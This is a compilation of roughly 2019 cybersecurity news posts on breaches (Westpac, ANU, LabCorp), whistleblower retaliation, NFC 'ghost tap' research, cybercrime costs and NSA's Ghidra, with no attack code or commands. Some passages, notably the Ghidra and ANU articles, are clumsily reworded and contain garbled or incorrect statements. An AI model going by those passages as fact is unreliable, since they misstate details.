How human bias impacts cybersecurity decision making

The human brain is a fantastic machine, but we’re all subject to cognitive bias and reasoning errors – and cybersecurity pros are no exception. In a newly released report, Dr Margaret Cunningham, psychologist and Principal Research Scientist at Forcepoint, examined six universal unconscious human biases, how they can influence cybesecurity decision making, and urges infosec pros and leaders to make an effort to overcome them. Inconvenient cognitive biases Our days are filled with decision making: … More

The post How human bias impacts cybersecurity decision making appeared first on Help Net Security.

Is there a weak link in blockchain security?

Recent research revealed that blockchain is set to become ubiquitous by 2025, entering mainstream business and underpinning supply chains worldwide. This technology is set to provide greater transparency, traceability and immutability, allowing people and organizations to share data without having to be concerned about security. However, blockchain is only as strong as its weakest link. Despite the hails surrounding blockchain’s immutable security, there are still risks surrounding it that organizations must be aware of – … More

The post Is there a weak link in blockchain security? appeared first on Help Net Security.

There’s a significant disconnect between DevOps capabilities and DevSecOps readiness

Retailers are putting their customer’s data at risk by failing to incorporate proper security controls in their new application development practices, according to the latest research from Claranet. DevOps adoption While the vast majority of retailers have adopted or plan to adopt a DevOps approach to speed up development cycles and improve the customer experience, less than half are completely confident in their ability to integrate security into this approach – also known as DevSecOps. … More

The post There’s a significant disconnect between DevOps capabilities and DevSecOps readiness appeared first on Help Net Security.

What Is SOC (Security Operations Center)?

What Is an SOC?

An SOC, or Security Operations Center, is a facility used by an information security team that is responsible for monitoring, analyzing, and ensuring an organization’s security. The main goal of the team is to find and respond to cybersecurity threats and incidents with the use of set processes and technological solutions. The security staff, composed of engineers, managers, and analysts, works closely with incident response teams to quickly address any security issue.

The SOC is responsible for monitoring and analyzing activities on different networks, databases, websites, applications, servers, and any other systems that the organization is using. It looks for any anomalous activity that could be an indication of a security threat. Once detected, the SOC is then tasked to respond to the incident; identify, analyze, and report it; and create new defensive processes against it if necessary.

How Does an SOC Work?

Instead of focusing on developing new strategies or designing security architecture, the SOC is responsible for the now, ensuring the safety of the organization’s systems. It is staffed primarily by security analysts working to detect and analyze cybersecurity incidents. They will then respond, report, and prevent said incident upon discovery. The team can also usually perform advanced forensic analysis, as well as cryptanalysis, and has the ability to reverse engineer malware to understand it better for future defense.

In order to establish an SOC, the organization first needs a clear strategy that incorporates the business’s goals from the different departments. Once this is developed, it is time to create an infrastructure to support that strategy. Security officer Pierluigi Paganini says that typically, SOCs include firewalls, breach detection capabilities, probes, IPS/IDS, and of course, a Security Information and Event Management System (SIEM). The infrastructure should also be able to collect data from different data flows, packet capture, syslog, and telemetry, as well as other data activities that can be collected and analyzed by the security staff.

Lastly, the SOC needs to have the ability to monitor networks and different endpoints for vulnerabilities to protect the sensitive data they may have in order to comply with industry- or government-laid regulations.

SOC Benefits

The main benefit of an SOC is to improve the overall security incident detection and response of the organization. By doing an analysis on all data activity, any breach should be quickly identified and responded to accordingly. This is a 24/7 monitoring channel that aims to block any and all malicious attacks against the organization.

SOC Best Practices

A shifting focus in the industry is going more with the human element in order to assess and mitigate threats rather than relying on a script to do so. Security personnel of SOCs continuously manage known threats while trying to identify new ones. While technologies such as firewalls and UPS can prevent most basic attacks, it is the human analysis that leads to discovering and responding to major incidents.

Any organization should have their SOC updated with the latest intelligence to use against potential malicious attacks. They need to keep up to date with what is happening and watch out for growing threats. At the same time, they need to keep updated with internal procedures and changes, as well as make proper adjustments in data collection and correlation and provide insights on threats and vulnerabilities. Lastly, tools need to be updated to be able to keep up with ever-changing security threats from external attacks.

You get a very successful SOC by combining highly skilled security analysts and efficient security automation. This is a huge undertaking, and many organizations that cannot have the proper in-house resources turn to managed service providers that offer SOC services instead.

The post What Is SOC (Security Operations Center)? appeared first on .

Westpac Cybersecurity Breach Impacts Almost 100,000 Customers

A major cybersecurity breach that has struck Australia’s Westpac Banking Corporation has reportedly impacted almost 100.000 customers.

Australian website nine.com.au reports, “A major cyber security breach has seen the private details of almost 100,000 Westpac customers exposed after the bank’s system was attacked by hackers.”

As per reports, it was PayID, the real-time payments platform that allows instant money transfer between banks using a mobile number or email address, that was targeted by the cybercriminals in this attack.

The Sydney Morning Herald, in a detailed report on the hacking incident, notes, “Unknown to many Australians, PayID operates like a telephone book, allowing anyone to type in a mobile number or email address and have it confirm the name of the corresponding account holder. This allows for what security experts call an “enumeration attack”, whereby numbers can be changed at random to find the names and mobile numbers of thousands of Australians…Experts say that with access to these details, fraud could be committed on a mass scale.”

Though Westpac has confirmed the attack, details haven’t been divulged as regards the number of people affected, say reports. It’s also reported that the Westpac data breach has affected customers from other banks as well.

The Sydney Morning Herald reports that Westpac has disclosed information about the breach to Australia’s banking and financial industry in a confidential memo, which has been obtained by the Sydney Morning Herald and The Age. As per the report, the memo says, “On 22 May 2019, Westpac noted that a high volume ([around] 600,000) of NPPA PayID lookups was made from 7 compromised Westpac Live accounts. [Around 98,000] of the lookups successfully resolved to a short name and this was displayed to the fraudster… Further analysis revealed that the attacks had been occurring since 7 April 2019 (the total number of lookups is [around] 600,000). The attackers are possibly offshore (the … intelligence of the logins indicates [they are] US-based fraudsters).”

The memo clarifies that the accounts that have been used for the breach seem to have been either compromised or set up to perform the attack. It’s stated that Westpac had got in touch with the legitimate owners of the existing accounts and they were not aware of the attacks or involved in any way. The Sydney Morning Herald report also states that as per the memo, the hackers had been trying phone numbers in a semi-sequential manner and also that it appears likely that the numbers are targeted based on guessing and don’t come from any existing data compromise. It’s also stated that the attacks were continuing on a semi-daily basis.

Westpac, upon detecting the issue, has taken additional preventive actions and had managed to go on without a system shutdown. It’s also reported that no customer bank account numbers have been compromised in the attack.

Experts point out that this data breach could make customers refrain from using the PayID system until they are certain that their personal data won’t be breached.

Also, Read:

Data Breaches in Healthcare Comes From Within

Cybersecurity Breaches Against Canadian Companies on the Rise

 

The post Westpac Cybersecurity Breach Impacts Almost 100,000 Customers appeared first on .

Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know

In October 2017, the city of Fort Worth, Texas became the target of a phishing scam.

Their accounts payable department received an email that appeared to be from Imperial Construction, a company that was doing business with the city at the time. The sender of the email, later identified as Gbenga A. Fadipe, requested a change of account.

The scam email prompted the department to change an electronic deposit from Plains Capital Bank to a different account with Chase Bank. Given the convincing nature of the email, the request received approval. The city’s accounts payable department believed that Imperial Construction had simply changed banks.

However, this wasn’t the case. Fadipe had planned the cyberattack to gain access to city accounts. According to the arrest warrant affidavit, he withdrew thousands of dollars between November 2017 and January 2018 from the new account with Chase Bank, severely compromising the cybersecurity of Fort Worth.

City officials responded, claiming that Fort Worth “had been the victim of fraud in late 2017 when, due to human error, a vendor payment was redirected to a bad actor.” As of now, Tarrant County has charged Fadipe with theft of property greater than $300,000, though the true cost of the scam is much higher. The injustice might have ended here, were it not for the events that transpired shortly afterwards.

Retaliation Against Whistleblowers

Fort Worth’s former IT manager, William Birchett, went to officials with concerns over the state of their cybersecurity following the attack. He made several claims, including that the city had left the medical and personal information of their employees accessible to anyone with internet access.

Birchett also brought attention to how the city had lied about its compliance with FBI crime database regulations. He reported his findings and submitted a proposal to Kevin Gunn, the city’s acting chief financial officer. Birchett also went to Roger Wright, the city’s acting chief technology officer.

Instead of moving forward with the changes, city officials fired Birchett in retaliation. They would later fire one of Birchett’s coworkers, Ronald Burke, who had previously supervised him. Both men have since filed whistleblower lawsuits against the city, with representation from attorney Stephen Kennedy.

Burke has also claimed the city retaliated against him for reporting issues with their cybersecurity and compliance with federal regulations. Like Birchett, Burke is seeking more than $1 million from the city of Fort Worth, which is “fully prepared to defend itself,” according to a recent statement from officials.

Response From Fort Worth Officials

In response to the allegations from Birchett and Burke, city officials said, “The people who have filed these suits were responsible for managing the very security items that they are now criticizing…” Officials went on to say they resolved the problem with their employee data “immediately,” but this is not the case.

Stephen Kennedy responded to the attempt by city officials to address the controversy, saying, “The City is not being forthright when it claims that it ‘immediately’ resolved issues concerning preservation of the City employees’ medical data information, unless your definition of the word immediate means six months…”

Birchett and Burke have provided additional insight into the city’s negligence. They allege that they repeatedly reported on problems with Fort Worth’s cybersecurity and compliance with federal Criminal Justice Information Services regulations. Despite their efforts, city officials refused to take action.

The behavior of Kevin Gunn, Robert Wright and other Fort Worth officials is indicative of a larger problem than the phishing scam with Imperial Construction. It shows a pattern of irresponsibility and neglect that goes back farther than 2017. Even with access to potential solutions, officials failed to act.

The Importance of Transparency

The decision to retaliate against whistleblowers is often counterintuitive. In this instance, the city of Forth Worth was attempting to suppress information, but the firing of Birchett and Burke only brought that information to the surface. Though city officials tried to ignore the flaws in their system, they only intensified.

This speaks to the importance of individuals like William Birchett and Ronald Burke. Without the courage of whistleblowers, an organization with illicit practices can continue to grow. Even if that organization retaliates, whistleblowers have protection under the law and can trust in the justice system to serve its purpose.

As context, OSHA’s Whistleblower Protection Program enforces the provisions in more than twenty whistleblower statutes, protecting employees in the healthcare, airline and food safety industries, among other sectors. In short, those who come forward with information about a company can expect fair treatment.

Looking Toward the Future

Gbenga A. Fadipe’s phishing scam revealed far more about the city of Fort Worth than anticipated. What started with a fraudulent email quickly transformed into something else, and now, Birchett and Burke are set to move forward with their individual lawsuits against the city. As the situation unfolds, it will likely have implications outside the state of Texas.

About the author

about paycheck

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post Fort Worth IT Professionals Fired for Reporting Cybersecurity Issues: What We Know appeared first on Security Affairs.

How to Advance ICS Cybersecurity: Implement Continuous Monitoring

Industrial Control Systems (ICS) include Supervisory Control and Data Acquisition (SCADA) systems, Distributed Control Systems (DCS) and other control system configurations such as Programmable Logic Controllers (PLC). They are typically used in industries such as electric, water, oil and natural gas, transportation, chemical, pharmaceutical and manufacturing (e.g., automotive, aerospace). These control systems are vital to […]… Read More

The post How to Advance ICS Cybersecurity: Implement Continuous Monitoring appeared first on The State of Security.

Criminals are selling hacking services targeting world’s biggest companies

A new study – undertaken by Dr. Mike McGuire, Senior Lecturer in Criminology at the University of Surrey, and underwritten by Bromium – provides details of first-hand intelligence gathered from covert discussions with dark net vendors, alongside analysis by a panel of global industry experts across law enforcement and government. Network compromise tools and services on the dark net Key findings: 4 in 10 dark net vendors are selling targeted hacking services aimed at FTSE … More

The post Criminals are selling hacking services targeting world’s biggest companies appeared first on Help Net Security.

Global communications service providers struggling to fend off growing number of DDoS attacks

Global communications service providers, whose businesses are predicated on continuous availability and reliable service levels, are struggling to fend off a growing number of DDoS attacks against their networks. A lack of timely and actionable intelligence is seen as a major obstacle to DDoS protection, according to A10 Networks. The critical need for DDoS protection The A10 Networks study conducted by the Ponemon Institute highlights the critical need for DDoS protection that provides higher levels … More

The post Global communications service providers struggling to fend off growing number of DDoS attacks appeared first on Help Net Security.

Workforce diversity key to plugging the IT skills gap

An (ISC)2 study of employees in 1,000 organizations in the U.K. and 250 in the Netherlands reveals that workplace diversity in IT and security has become a key operational concern, as organizations broaden their efforts to encourage diversity and inclusivity amid the impact of the sector’s skills shortage on IT and cybersecurity recruitment and staff retention. Talent acquisition and retention is the leading operational reason that companies have been ramping up their diversity initiatives, according … More

The post Workforce diversity key to plugging the IT skills gap appeared first on Help Net Security.

Trust nothing: A life in infosec is a life of suspicion

Like many before him, Amit Serper started his cybersecurity career in one of Israel’s intelligence agencies. Nine years later, he left for the private sector: he joined Cybereason, a cyber security company started by former colleagues which specializes in endpoint (EDR) and managed detection and response (MDR). When he started there as a senior security researcher, then progressed to different research roles. Today, he’s the company’s head of security research, leading Nocturnus, its advanced global … More

The post Trust nothing: A life in infosec is a life of suspicion appeared first on Help Net Security.

How privileged insiders threaten the security of global organizations

A new global survey from BeyondTrust explores the visibility, control, and management that IT organizations in the U.S., APAC, Europe and the Middle East have over employees, contractors, and third-party vendors with privileged access to their IT networks. Security hygiene According to the report, 64% believe they’ve likely had either a direct or indirect breach due to misused or abused employee access in the last 12 months, and 62% believe they’ve had a breach due … More

The post How privileged insiders threaten the security of global organizations appeared first on Help Net Security.

Will biometrics replace passwords for online payment authentication?

Over half of consumers in the UK (53 percent) are worried that the shift to biometrics to authenticate online payments will dramatically increase the amount of identity fraud, according to new research conducted by Paysafe, a leading global payments provider. The research, found that over three quarters (79 percent) of consumers still favour passwords for making payments online due to concerns about the security of new biometric options. The annual study tracks changing views on … More

The post Will biometrics replace passwords for online payment authentication? appeared first on Help Net Security.

Revealed: 2016 Russian Troll Activity More Lucrative and Widespread

Online activity by Russian trolls in the lead-up to the 2016 election was significantly more widespread than initially estimated, cybersecurity firm Symantec concluded.

Symantec announced their findings following the analysis of a dataset released by Twitter in October 2018. The data, consisting of 3,900 accounts and 10 million tweets linked to a Russian company known as the Internet Research Agency (IRA), showed a massive and coordinated campaign to target both sides of the U.S. political divide with propaganda relating to wedge issues.

Twitter activity from the IRA was categorized by Symantec. There were 123 “main accounts,” with large numbers of followers and mostly generating new content as well as 3,713 “auxiliary” accounts, which were used to amplify the messaging from those main accounts.  

“Main accounts generally were ‘fake news’ outlets masquerading as regional news outlets, or pretending to be political parties or hashtag games,” stated the report. “The top 20 most retweeted English-language accounts were split evenly between conservative and liberal messages.”

The most successful account in the IRA campaign went by the username TEN_GOP. The handle dubbed itself the “Unofficial Twitter of Tennessee Republicans. Covering breaking news, national politics, foreign policy and more.” It managed to accumulate almost 150,000 followers and 6 million retweets, almost entirely from non-IRA-linked accounts.

Among the IRA fake news accounts were “New York City Today,” “Chicago Daily News,” “San Francisco Daily,” and many others. Their primary function seems to have been the proliferation and adoption of fake or skewed news content to further propagandize targeted audiences.

“It was a highly professional campaign. Aside from the sheer volume of tweets generated over a period of years, its orchestrators developed a streamlined operation that automated the publication of new content and leveraged a network of auxiliary accounts to amplify its impact.”

 

The post Revealed: 2016 Russian Troll Activity More Lucrative and Widespread appeared first on Adam Levin.

4 Tips to Protect Your Information During Medical Data Breaches

As the companies we trust with our data become more digital, it’s important for users to realize how this affects their own cybersecurity. Take your medical care provider, for instance. You walk into a doctor’s office and fill out a form on a clipboard. This information is then transferred to a computer where a patient Electronic Health Record is created or added to. We trust that our healthcare provider has taken the proper precautions to safely store this data. Unfortunately, medical data breaches are on the rise with a 70% increase over the past seven years. In fact, medical testing company LabCorp just announced that it experienced a breach affecting approximately 7.7 million customers.

How exactly did this breach occur? The information was exposed as a result of an issue with a third-party billing collections vendor, American Medical Collection Agency (AMCA). The information exposed includes names, addresses, birth dates, balance information, and credit card or bank account information provided by customers to AMCA. This breach comes just a few days after Quest Diagnostics, another company who worked with AMCA, announced that they too experienced a breach affecting 11.9 million users.

Luckily, LabCorp stated that they do not store or maintain Social Security numbers and insurance information for their customers. Additionally, the company provided no ordered test, lab results, or diagnostic information to AMCA. LabCorp stated that they intend to provide 200,000 affected users with more specific information regarding the breach and offer them with identity protection and credit monitoring services for two years. And after receiving information on the possible security compromise, AMCA took down its web payments page and hired an external forensics firm to investigate the situation.

Medical data is essentially nonperishable in nature, making it extremely valuable to cybercrooks. It turns out that quite a few security vulnerabilities exist in the healthcare industry, such as unencrypted traffic between servers, the ability to create admin accounts remotely, and disclosure of private information. These types of vulnerabilities could allow cybercriminals to access healthcare systems, as our McAfee Labs researchers discovered. If someone with malicious intent did access the system, they would have the ability to permanently alter medical images, use medical research data for extortion, and more.

Cybercriminals are constantly pivoting their tactics and changing their targets in order to best complete their schemes. As it turns out, medical data has become a hot commodity for cybercrooks. According to the McAfee Labs Threats Report from March 2018, the healthcare sector has experienced a 210% increase in publicly disclosed security incidents from 2016 to 2017. The McAfee Advanced Threat Research Team concluded that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

While medical care providers should do all that they can to ensure the security of their patients, there are steps users can take to help maintain their privacy. If you think your personal or financial information might be affected by the recent breaches, check out the following tips to help keep your personal data secure:

  • Place a fraud alert.If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit.Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection.A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Be vigilant about checking your accounts.If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blogs.

NFC Vulnerability May Promote Ghost Screen Taps

Convenience vs Security, that is the frequently recurring theme when it comes to cybersecurity nowadays. Every time a new technology opens its doors to more convenience is when it becomes the new kid on the block when it comes to vulnerabilities. Here in hackercombat.com, we are eager to tell you over-and-over again our dear readers that convenience is the natural enemy of security. The newest issue of this convenience vs security theme has something to do with NFC, and the new attack proof-of-concept presented by Waseda University researchers in Tokyo which they aptly named Tap ‘n Ghost.

The 18-page paper released by a team of three researchers named Tatsuya Mori, Seita Maruyama and Satohiro Wakabayashi demonstrated the vulnerability of NFC feature built-in with many mainstream smartphones sold today. They described it as a combination of a Ghost Touch Generator and TAP (Tag-based Adaptive Ploy), that gives attackers at close range the capability to generate “Ghost Taps” against a target device, through a special combination of a battery pack, high-voltage transformer, an off-the-shelf 5mm copper sheet, NFC writer and a single-board computer like the Raspberry Pie/small laptop.

NFC

The above image is the proof-of-concept contraption that can be installed in any seemingly ordinary table in a restaurant, coffee shop or any public store. NFC communicates wirelessly in the range of just between 4 to 10 centimeters, with a rigged device such as the above the malicious attacker can then connect to the victim’s NFC-enabled smartphone (of any device with an NFC feature). It can then tell the target smartphone to open a specific website automatically. The attacker can also pretend to issue an innocent request for Bluetooth pairing or Wifi connection attempt, which fortunately requires user-permission to proceed.

Versions of Android from 9.0 or older has the convenient behavior of trusting all NFC pairing attempts when it detects one is something near. The contraption comes with copper interconnects which can produce enough electrical disturbance within the NFC range, enabling the phone to perform Ghost taps, no different from a user tapping his phone to perform an action. At first glance, this sounded like science fiction at first, but the trio of researchers showed to the presentation how these rogue taps can be generated to “provide permission” to the ghost Bluetooth pairing or wifi connection attempts mentioned earlier, completing the whole process.

At the time of this writing, the following mainstream Android devices from Sony, Sharp, HTC, Asus, Fujitsu, and Samsung were known to be vulnerable:

  • Xperia Z4
  • Galaxy S6 Edge
  • Galaxy S4
  • Aquos Zeta SH-04F
  • Nexus 9
  • Arrows NX F005-F
  • Nexus 7

It is now yet known if current devices sold in the market with NFC are also affected, but the three researchers mentioned that the false touch vulnerability may also exist on newer devices as the protocols of NFC remains the same across generations of devices. The IEEE Symposium on Security and Privacy shared a video detailing the exact components of the Ghost ‘n Tap device, its operations and basic understanding of the snooping process against NFC devices.

This vulnerability may one-day prompt smartphone vendors to ship their mobile phones with NFC disabled by default. This new disabled by-default behavior will also benefit Android users, as the device do not need to consume more energy to power-up the NFC component of the smartphone even if the user does not currently need it.

Also, Read:

Why You Need to be Careful About the BlueKeep Vulnerability

Belkin Wemo Insight Smart Plug Vulnerability Remains Exploitable

Google Photos Vulnerability that Lets Retrieve Image Metadata

New Google Chrome Zero-Day Vulnerability Detected

Important Features of Vulnerability Scanners

 

The post NFC Vulnerability May Promote Ghost Screen Taps appeared first on .

ANU Cyber Breach, Students and Staff’s Personal Data Stolen

Personal data of nearly 200,000 students and staff members of the Australian National University were in a “sophisticated” cyber-attack. The trend shows that a similar breach happened to the Chinese government last year.

The university admitted that hackers were stealing data dating back 19 years and included banking information, passport information, as well as past and current academic and personal records.

Vice-chancellor Brian Schmidt said the university was working with government security agencies to investigate the breach, which occurred in late 2018 and was detected two weeks ago.

Brian Schmidt the Vice-Chancellor said the university was working with government security agencies to investigate the cyber-attack.

“We believe there was unauthorized access to significant amounts of personal staff, student and visitor data extending back 19 years,” Professor Schmidt said in a letter to students and staff.

“Depending on the information you have provided to the university, this may include names, addresses, dates of birth, phone numbers, personal email addresses, and emergency contact details, tax file numbers, payroll information, bank account details, and passport details. Student academic records were also accessed.”

There was “no evidence” research work had been affected said, Professor Schmidt.

A spokesperson of the university estimated the number of people affected to be 200,000, depending on the annual number of students and staff turnover.

Stephen Lockstep, an information security analyst at Constellation Research, questioned why the ANU was keeping so many years’ worth of data in systems that were connected to the internet. “Assuming that some of the 19-year-old data is for long-gone ANU students and staff, why does anyone at the university need ready online access to such old data?” he said.

Authorities said it was too early to say who was behind the attack, or whether it was linked to a separate violation of the university’s systems more than a year ago.

Education Minister Dan Tehan has announced that he will invite the country’s vice-chancellors to a briefing with the Australian government’s cybersecurity center to ensure that they are up to date on cybersecurity.

“Universities have a responsibility to protect the information they hold about individuals and the research they are conducting,” he said.

The ANU is considered an attractive destination because of its close ties to the Australian Government. Many students continue to work in the federal government, and many government officials, including military personnel, complete part-time career education at the university.

According to sources ‘stealing data of staff and students, hackers can develop long-term visions of students and staff who continue to hold critical positions in the Canberra bureaucracy.

A spokesman for the electronic spy agency, the Australian Signals Directorate, confirmed the agency was working to “secure the networks, protect users and investigate the full extent of the compromise”.

Also, Read:

Cyber Breach Higher in Financial Services Sector

User Payment Data Stolen from U.S Government Payment Portals

Hacks of US Department of State email server and Data Stolen

Newegg Inc. Suffers Hack, Credit Card Data Stolen

The post ANU Cyber Breach, Students and Staff’s Personal Data Stolen appeared first on .

Advancing transparency and accountability in the cybersecurity industry

NSS Labs, the Texas-based company that specializes in testing the world’s security products, has a new CEO. Jason Brvenik, the company’s CTO since early 2017, took over the role from Vikram Phatak, the company’s founder. But, as Brvenik told Help Net Security, the company’s strategic priorities remain unchanged: their mission is to advance transparency and accountability in the cybersecurity industry. “If you look at the dollars being spent to improve cyber protections versus the dollars … More

The post Advancing transparency and accountability in the cybersecurity industry appeared first on Help Net Security.

Embrace chaos to improve cloud infrastructure resilience

Netflix is a champion of using chaos engineering to improve the resilience of its cloud infrastructure. That’s how it ensures its customers don’t have their Stranger Things binge watching sessions interrupted. Netflix is one of a growing number of companies including Nike, Amazon and Microsoft that leverage chaos engineering as a means of stress testing their cloud infrastructures against a variety of unpredictable cloud events, such as a loss of cloud resources or entire regions. … More

The post Embrace chaos to improve cloud infrastructure resilience appeared first on Help Net Security.

2018 in numbers: Data breaches cost $654 billion, expose 2.8 billion data records in the U.S.

Cybercriminals exposed 2.8 billion consumer data records in 2018, costing over $654 billion to U.S. organizations, according to ForgeRock. Cyberattacks to U.S. financial services organizations cost the industry over $6.2 billion in Q1 2019 alone, up from just $8 million in Q1 2018. Even though investments in information security products and services have been on the rise, with $114 billion invested in 2018, cybercriminals continue to attack organizations across a wide spectrum of industries to … More

The post 2018 in numbers: Data breaches cost $654 billion, expose 2.8 billion data records in the U.S. appeared first on Help Net Security.

Despite disclosure laws, cybercrime may be widely underreported

While attack vectors remain largely the same year over year, attack volume will increase and cybercrime may be vastly underreported, according to the 2019 State of Cybersecurity Study from global IT and cybersecurity association ISACA. “Underreporting cybercrime – even when disclosure is legally mandated – appears to be the norm, which is a significant concern,” said Greg Touhill, Brigadier General (ret), ISACA Board Director, president of Cyxtera Federal and the first US Federal CISO. “Half … More

The post Despite disclosure laws, cybercrime may be widely underreported appeared first on Help Net Security.

Unclassified data creates security blind spots for most companies

Global businesses continue to house ‘dark data’ within their organizations, creating a honeypot for cybercriminals, finds research from Veritas Technologies. The value of data The Value of Data study, conducted by Vanson Bourne for Veritas, surveyed 1,500 IT decision makers and data managers across 15 countries. It reveals that on average, over half (52 percent) of all data within organizations remains unclassified or untagged, indicating that businesses have limited or no visibility over vast volumes … More

The post Unclassified data creates security blind spots for most companies appeared first on Help Net Security.

The Cost of Cybercrime

Really interesting paper calculating the worldwide cost of cybercrime:

Abstract: In 2012 we presented the first systematic study of the costs of cybercrime. In this paper,we report what has changed in the seven years since. The period has seen major platform evolution, with the mobile phone replacing the PC and laptop as the consumer terminal of choice, with Android replacing Windows, and with many services moving to the cloud.The use of social networks has become extremely widespread. The executive summary is that about half of all property crime, by volume and by value, is now online. We hypothesised in 2012 that this might be so; it is now established by multiple victimisation studies.Many cybercrime patterns appear to be fairly stable, but there are some interesting changes.Payment fraud, for example, has more than doubled in value but has fallen slightly as a proportion of payment value; the payment system has simply become bigger, and slightly more efficient. Several new cybercrimes are significant enough to mention, including business email compromise and crimes involving cryptocurrencies. The move to the cloud means that system misconfiguration may now be responsible for as many breaches as phishing. Some companies have suffered large losses as a side-effect of denial-of-service worms released by state actors, such as NotPetya; we have to take a view on whether they count as cybercrime.The infrastructure supporting cybercrime, such as botnets, continues to evolve, and specific crimes such as premium-rate phone scams have evolved some interesting variants. The over-all picture is the same as in 2012: traditional offences that are now technically 'computercrimes' such as tax and welfare fraud cost the typical citizen in the low hundreds of Euros/dollars a year; payment frauds and similar offences, where the modus operandi has been completely changed by computers, cost in the tens; while the new computer crimes cost in the tens of cents. Defending against the platforms used to support the latter two types of crime cost citizens in the tens of dollars. Our conclusions remain broadly the same as in 2012:it would be economically rational to spend less in anticipation of cybercrime (on antivirus, firewalls, etc.) and more on response. We are particularly bad at prosecuting criminals who operate infrastructure that other wrongdoers exploit. Given the growing realisation among policymakers that crime hasn't been falling over the past decade, merely moving online, we might reasonably hope for better funded and coordinated law-enforcement action.

Richard Clayton gave a presentation on this yesterday at WEIS. His final slide contained a summary.

  • Payment fraud is up, but credit card sales are up even more -- so we're winning.

  • Cryptocurrencies are enabling new scams, but the bit money is still being list in more traditional investment fraud.

  • Telcom fraud is down, basically because Skype is free.

  • Anti-virus fraud has almost disappeared, but tech support scams are growing very rapidly.

  • The big money is still in tax fraud, welfare fraud, VAT fraud, and so on.

  • We spend more money on cyber defense than we do on the actual losses.

  • Criminals largely act with impunity. They don't believe they will get caught, and mostly that's correct.

Bottom line: the technology has changed a lot since 2012, but the economic considerations remain unchanged.

Is AI fundamental to the future of cybersecurity?

While a significant proportion of SMEs believe in their current approach to security, they are struggling when it comes to allocation of budget, according to a Senseon research project. There is increasing uncertainty on whether the investment into the security solutions they’re currently using is worth the cost. The survey also reveals that SMEs have been slow to implement AI solutions, despite the vast majority of SMEs surveyed (81 percent) thinking that AI will be … More

The post Is AI fundamental to the future of cybersecurity? appeared first on Help Net Security.

How organizations are managing vulnerability risks

Tripwire evaluated how organizations are managing vulnerability risks and found that more than one in four (27 percent) globally have been breached as a result of unpatched vulnerabilities, with an even higher rate in Europe (34 percent). Vulnerability management starts with visibility of the attack surface, and Tripwire’s report found that 59 percent of global organizations are able to detect new hardware and software on their networks within minutes or hours. However, this is a … More

The post How organizations are managing vulnerability risks appeared first on Help Net Security.

Ghidra, A Powerful Cybersecurity Tool By NSA

And while NSA cybersecurity adviser Rob Joyce called the tool a “contribution to the nation’s cybersecurity community” in announcing it at RSA, it will no doubt be used far beyond the United States.

Ghidra is not a tool that facilitates you to hack a device. It is a reverse engineering platform that is used to “compile,” implement, and decompile. In other words, it converts one and zero into a human-readable format and makes it easy for you to know what the software is up to and impact it carries. Reverse engineering is an important process for malware analysts and threat intelligence researchers because they can work with the software they find in around, such as malware used to carry out attacks. to understand how it works, what skills it has and who wrote it or where it came from. Reverse engineering is also an important way for supporters to check their code for vulnerabilities and ensure the function as intended.

“If you’ve done software reverse engineering, what you’ve found out is it’s both art and science; there’s not a hard path from the beginning to the end,” Joyce said. “Ghidra is a software reverse-engineering tool built for our internal use at NSA. We’re not claiming that this is the one that’s going to be replacing everything out there—it’s not. But it helped us address some things in our workflow.”

Having said that reverse engineering products were already there in the market, including the famous IDA disassembler and debugger. However, Joyce shows that the NSA has been developing Ghidra for years, taking into account priorities and real needs, and making it a powerful and very useful tool. Even products like IDA need costs and make Ghidra Open Source the first tool available for free. This is an important contribution to the formation of the next generation of cybersecurity advocates. (As with other open source codes, we expect some errors). Joyce also noted that the NSA saw the introduction of Ghidra as a recruitment strategy that facilitated the entry of new employees to the NSA or allowed authorized employers to share their experiences without having to know the tool.

The NSA announced Joyce’s speech at the upcoming RSA and Ghidra release in early January. However, knowledge of this tool is publicly available thanks to the release of “Vault 7” by WikiLeaks in March 2017, which analyzed a number of hacking tools used by the CIA, and repeatedly referenced Ghidra as a reverse engineering tool made by the NSA. The code itself, with 1.2 million channels just coming into effect on Tuesday. Ghidra runs on Windows, MacOS, and Linux and includes all the security components provided by researchers. Joyce, however, has focused on adjusting tools. It was also developed to facilitate collaboration between different people involved in the same reverse project, a concept that is not so common on other platforms.

Ghidra also has a user interface and features to make an investment as easy as possible given the complexity and time. As Joyce put it as his favorite feature, the undo/redo mechanism that allows users to test theories about the function of the code being analyzed. If the idea doesn’t work, you can easily go back a few steps.

Over the years, NSA has developed other open source code, such as Security-Enhanced Linux and Security-Enhanced Android initiative. But Ghidra seems to speak more directly about discourse and tension at the heart of cybersecurity now. Available for free, it may spread and inform defense and offensive unexpectedly. If it seems that launching the tool can give hackers an edge over so they can find out how to evade NSA, even Dave Aitel, a former NSA researcher who is now the director of Cyxtera security infrastructure security technology, said that this was not the case of concern.

“Malware authors already know how to make it annoying to reverse their code,” Aitel said. “There’s really no downside” to releasing Ghidra.

Joyce emphasized on Tuesday that “No matter what comes next for the NSA’s powerful reversing tool, it is an earnest contribution to the community of cybersecurity defenders—and that conspiracy theorists can rest easy. “There’s no backdoor in Ghidra,” he said. “

Also, Read:

Zero Trust Architecture and its Relevance in Cybersecurity

UK’s FOI Request Exposes British Government Cybersecurity Weaknesses

Essential Cybersecurity Tools for Business Organizations

Ireland And Its Evolving Cybersecurity Issues

Simple Changes To Address SMB’s Cybersecurity Challenges

 

The post Ghidra, A Powerful Cybersecurity Tool By NSA appeared first on .

Cisco Security & Trust at Cisco Live US

